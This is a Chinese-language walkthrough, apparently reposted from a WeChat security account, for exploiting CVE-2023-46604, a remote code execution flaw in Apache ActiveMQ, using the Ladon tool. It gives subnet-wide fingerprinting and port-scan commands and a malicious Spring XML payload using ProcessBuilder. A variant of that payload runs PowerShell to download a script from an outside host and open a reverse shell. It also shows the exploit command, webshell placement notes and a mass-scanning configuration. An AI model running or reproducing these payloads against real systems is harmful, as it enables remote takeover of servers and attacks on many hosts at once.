简介
Apache 软件基金会 (ASF)于 10 月 27 日披露了一个被追踪为CVE-2023-46604的漏洞,允许有权访问 ActiveMQ 消息代理的远程攻击者在受影响的系统上执行任意命令。Rapid7 的研究人员报告称,在ASF 披露漏洞的同一天,就观察到了两个针对该漏洞的利用活动。
漏洞POC已满天飞,来个Ladon批量检测和win系统反弹Shell方法,Linux反弹shell最简单不用说了,该漏洞需连网,目标不连网就无法利用。
影响版本
Apache ActiveMQ 5.18.0 before 5.18.3Apache ActiveMQ 5.17.0 before 5.17.6Apache ActiveMQ 5.16.0 before 5.16.7Apache ActiveMQ before 5.15.16Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
环境
官方下载安装包5.18.2
jdk 17
进入Bin目录,以下命令启动
activemq.bat start默认端口 默认条件
8161 web 只允许本机 需配置才可远程访问
61616 tcp 任意主机 远程访问
用户密码 admin admin
0x001 Ladon CMS识别ActiveMQ
允许远程访问的web页面,可使用WhatCMS模块识别
Ladon http://192.168.1.8:8161 WhatCMS 指定URLLadon 192.168.1.8/24 WhatCMS C段Ladon 192.168.1.8/c WhatCMS C段
0x002 Ladon 端口识别ActiveMQ
默认61616端口是开的,而8161不一定开放,可使用PortScan扫描
Ladon 192.168.1.8 PortScan 61616 指定端口Ladon 192.168.1.8 PortScan 常见端口Ladon 192.168.1.8/24 PortScan 61616 C段 指定端口Ladon 192.168.1.8/c PortScan C段 常见端口
0x003 漏洞复现 反弹Shell
<beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg ><list><value>open</value><value>-a</value><value>calculator</value></list></constructor-arg></bean></beans>
(1)首先使用Ladon的反弹shell生成器,生成对应系统的反弹shell命令,如本次实验环境为Windows,那么我们就用windows的,如果是linux就选用Linux反弹shell命令,Ladon集成各种写法,可快速响应各种漏洞
替换poc.xmll中的内容,生成的反弹shell命令
<beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg ><list><value>cmd</value><value>/c</value><value>powershell -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.188.2:800/Ladon.ps1');Ladon ReverseTcp 192.168.188.2 4444 nc"</value></list></constructor-arg></bean></beans>
(3)启动Ladon渗透专用迷你web服务器、启动NC监听
同目录下放poc.xml和Ladon.ps1(用于Windows反弹shell)
Ladon web 800
(4)漏洞利用 Ladon >= 11.9
Ladon CVE-2023-46604 -i 192.168.1.8 -u http://192.168.1.1/poc.xml
(5) 成功反弹Shell
0x004 WebShell
http://127.0.0.1:8161 提示401
http://127.0.0.1:8161/index.html 默认可访问
除了index.html 自己放的其它txt、html、jsp均提示404,登陆后才可访问,但JSP、jspx并不解析
所以webshell放在admin目录,需登陆才可执行cmd
0x005 批量检测漏洞
CVE-2023-46604.ini脚本内容
[Ladon]exe=Ladon911arg=CVE-2023-46604 -i $ip$ -p 61616 -u http://192.168.1.1/isvul.xmllog=true
批量命令
Ladon 192.168.1.8 CVE-2023-46604.iniLadon 192.168.1.8/24 CVE-2023-46604.iniLadon ip.txt CVE-2023-46604.ini
请求文件使用isvul.xml,存在漏洞的IP高亮显示 并保存isvul.txt中
原文始发于微信公众号(K8实验室):CVE-2023-46604 Apache ActiveMQ RCE Ladon漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论